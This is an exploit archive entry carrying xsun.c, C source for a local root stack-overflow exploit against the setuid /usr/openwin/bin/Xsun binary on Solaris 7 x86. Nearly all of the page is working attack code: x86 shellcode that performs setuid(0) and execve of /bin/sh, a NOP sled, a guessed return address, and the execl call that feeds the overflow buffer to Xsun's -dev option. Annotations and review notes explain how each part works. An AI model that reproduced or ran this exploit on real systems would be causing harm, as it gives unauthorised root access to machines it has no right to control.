
xsun.c

xsun.c
Posted Apr 25, 2000
Authored by Anathema | Site hack.co.za

xsun.c is a local root stack-overflow exploit for /usr/openwin/bin/Xsun on Solaris 7 x86.

tags | exploit, overflow, x86, local, root
systems | solaris
SHA-256 | 8af8334ae766a801bf8d4fc9e432e34370f3f1ad1621d0fed7d083f188ac984f

xsun.c

/*
* PRIVATE. DO NOT DISTRIBUTE.
*
* Xsun (solaris 7 x86) local root stack overflow.
* by anathema <anathema@hack.co.za>
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define RETPOS 3217
#define OFFSET 6000

/*
 * Payload bytes that main() copies into the tail of its argument buffer.
 * main() sizes it with strlen(), so the literal contains no 0x00 byte; the
 * zero fields the code needs are written at run time by the movb/movl
 * stores annotated below.  Going by the author's own annotations it issues
 * two Solaris/x86 system calls through lcall gates: setuid(0) (%al = 0x17)
 * and then execve() of "/bin/sh" (%al = 0x3b).  The 0x01..0x04 runs after
 * "/bin/sh" appear to be placeholders that the stores above patch with the
 * argument pointer and NULs; the final seven bytes are the second lcall.
 * Everything here is hard-wired to the Solaris 7 x86 syscall gate.
 */
char c0de[] =
/* main: */
"\xeb\x0a" /* jmp ahead */
/* a_lcall: */
"\x9a\x78\x78\x78\x5c\x07\x78" /* lcall */
"\xc3" /* ret */
/* jmp_0: */
"\xeb\x05" /* jmp start_0 */
/* ahead: */
"\xe8\xf9\xff\xff\xff" /* call jmp_0 */
/* start_0: */ /* setuid(0); - yes, this is necessary */
"\x5e" /* popl %esi */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xe8\xe0\xff\xff\xff" /* call a_lcall */
"\xeb\x1f" /* jmp callz */
/* start: */ /* execve /bin/sh */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi), %ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi) */
"\x89\x46\x14" /* movl %eax, 0x14(%esi) */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
"\x89\x46\x07" /* movl %eax, 0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x51" /* pushl %ecx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */
/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" /* placeholders, patched at run time */
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */

/*
 * Builds the oversized "-dev" argument and execs the setuid Xsun binary
 * with it.  Usage: xsun [offset]; the optional argument is added to a
 * stack address instead of the default OFFSET.
 *
 * buf layout by index: [0] ':'; [1..RETPOS] 0x90 (x86 nop) filler with
 * c0de copied into its tail; [RETPOS..RETPOS+3] the guessed address,
 * little-endian.  The highest index written is RETPOS+3 = 3220, well
 * inside the 8192-byte array, and the array is zero-initialised, so the
 * argument stays NUL-terminated.
 *
 * Review notes (code left exactly as posted):
 *  - u_char/u_long come from <sys/types.h> and memset/memcpy/strlen from
 *    <string.h>; neither header is included, so this leans on pre-C99
 *    implicit declarations and will not compile as C99+ without them.
 *  - `u_long addr = &addr;` stores a pointer in an integer without a cast;
 *    it only holds the whole address where sizeof(long) == sizeof(void *).
 *  - argv[1] is parsed with atoi(), so garbage silently becomes 0.
 *  - execl()'s variadic terminator should be `(char *)NULL`.
 *  - execl() returns only on failure, which perror() reports; main() then
 *    falls off the end without a return value.
 */
int
main(int argc, char **argv)
{
u_char buf[8192] = {0}; /* zero-filled: everything past the written bytes is NUL */
u_long addr = &addr; /* address of this very local, i.e. a point on the current stack */
int ret = RETPOS, i = 0; /* i is never used */

fprintf(stderr, "Xsun local root overflow, solaris 7 x86\n"
"Copyright (c) anathema <anathema@box.co.uk>\n\n");

/* optional user offset, otherwise the hard-coded default */
if (argc > 1) addr += atoi(argv[1]);
else addr += OFFSET;
fprintf(stderr, "-> 0x%lx\n", addr);

buf[0] = ':';
memset(buf + 1, 0x90, ret); /* fills indices 1..RETPOS */
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de)); /* payload ends at index RETPOS-1 */

/* 32-bit address, least significant byte first */
buf[ret++] = (addr & 0xff);
buf[ret++] = (addr >> 8) & 0xff;
buf[ret++] = (addr >> 16) & 0xff;
buf[ret++] = (addr >> 24) & 0xff;

/* buf is handed to Xsun as the value of its -dev option */
execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buf, NULL);
perror("execl"); /* reached only if the exec itself failed */
}

/* EOF */
/* www.hack.co.za */
